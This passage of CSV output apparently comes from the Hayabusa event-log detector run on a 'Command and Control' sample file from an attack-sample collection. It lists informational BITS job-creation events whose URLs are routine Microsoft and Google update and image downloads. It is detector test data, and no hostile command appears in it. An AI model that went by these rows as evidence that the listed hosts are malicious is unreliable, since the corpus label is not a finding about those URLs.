Control/bits_openvpn.evtx -2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job 
Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 
00:56:12.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,informational,Bits Job 
Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe : URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification 
Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe : URL: 
http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: 
http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:25.377 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 00:54:59.449 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:52:42.355 
